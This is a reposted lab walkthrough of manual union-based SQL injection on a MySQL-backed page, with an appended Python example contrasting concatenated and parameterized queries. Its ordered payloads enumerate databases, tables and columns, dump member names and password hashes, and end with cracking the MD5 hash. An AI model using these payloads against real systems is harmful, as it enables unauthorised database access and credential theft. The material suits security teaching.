80. Manual SQL injection vulnerability testing (MySQL database)

Reposted verbatim from https://www.dazhuanlan.com/2019/08/25/5d62593d1d0a1/


Open the web page, follow the scrolling announcement below the login form, and test it as the injection point.
?id=1 and 1=1 returns a normal page and ?id=1 and 1=2 returns an error, which indicates an injection point.

?id=1 order by 5
Queries the number of columns. Keep reducing the number until the page returns to normal.

?id=1 and 1=2 union select 1,version(),database(),4
Queries the version and the database name.
(At this point we know the database is mozhe_Discuz_StormGroup.)

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1
Queries the databases. limit 0,1 means fetch 1 row starting from row 0.

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
Queries the databases. limit 1,1 means fetch 1 row starting from row 1.

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 2,1
Queries the databases. limit 2,1 means fetch 1 row starting from row 2.

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1
Queries the databases. limit 3,1 means fetch 1 row starting from row 3.

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 4,1
Queries the databases. limit 4,1 means fetch 1 row starting from row 4.

?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1
Queries the table names in the mozhe_Discuz_StormGroup database, fetching one row starting from row 0.
(At this point we know the database has the table StormGroup_member.)

?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 1,1
Queries the table names in the mozhe_Discuz_StormGroup database, fetching one row starting from row 1.

?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 2,1
Queries the table names in the mozhe_Discuz_StormGroup database, fetching one row starting from row 2. An error is returned, indicating that there are only two tables.

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 0,1
Queries the fields of the StormGroup_member table, fetching one row starting from row 0.

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 1,1
Queries the fields of the StormGroup_member table, fetching one row starting from row 1.

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 2,1
Queries the fields of the StormGroup_member table, fetching one row starting from row 2.

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name='StormGroup_member' limit 3,1
Queries the fields of the StormGroup_member table, fetching one row starting from row 3.

?id=1 and 1=2 union select 1,concat(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1
Fetches the values of row 0.

?id=1 and 1=2 union select 1,concat(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1
Fetches the values of row 1.

Crack the MD5 password hash to obtain the login key.
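
Added example, not part of the original post: the same id parameter handled by a concatenated query and by a validated, parameterized one, so the probes used above can be compared against both. It assumes an in-memory SQLite database standing in for the lab's MySQL server; the notice and member tables, their rows and the function names are constructed for illustration.

```python
import sqlite3

# Probes taken from the walkthrough above (union target adapted to the sample table).
PROBES = ["1 and 1=1", "1 and 1=2",
          "1 and 1=2 union select 1,name,password,4 from member"]

def make_db():
    # Constructed sample data; SQLite stands in for the lab's MySQL database.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notice (id INTEGER, title TEXT, content TEXT, created TEXT);
        INSERT INTO notice VALUES (1, 'Maintenance', 'Scheduled downtime', '2019-08-25');
        CREATE TABLE member (name TEXT, password TEXT, status INTEGER);
        INSERT INTO member VALUES ('demo', 'constructed-hash-value', 1);
    """)
    return db

def get_notice_vulnerable(db, raw_id):
    # The parameter is concatenated into the statement, so anything after the
    # number is parsed as SQL: this is what makes 1=1 / 1=2 behave differently.
    sql = "SELECT id, title, content, created FROM notice WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_notice_hardened(db, raw_id):
    # Step 1: allow-list the input. An id is a plain ASCII decimal number.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    # Step 2: bind the value as data; it can never change the query's structure.
    sql = "SELECT id, title, content, created FROM notice WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def compare(db):
    # Map each probe to (vulnerable result, hardened result).
    return {p: (get_notice_vulnerable(db, p), get_notice_hardened(db, p))
            for p in PROBES}

if __name__ == "__main__":
    for probe, (weak, safe) in compare(make_db()).items():
        print(f"{probe!r}\n  concatenated: {weak}\n  parameterized: {safe}")
```

With the hardened function the 1=1 and 1=2 probes return the same empty result, so the true/false difference the test in this post relies on disappears.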

Origin www.cnblogs.com/petewell/p/11408832.html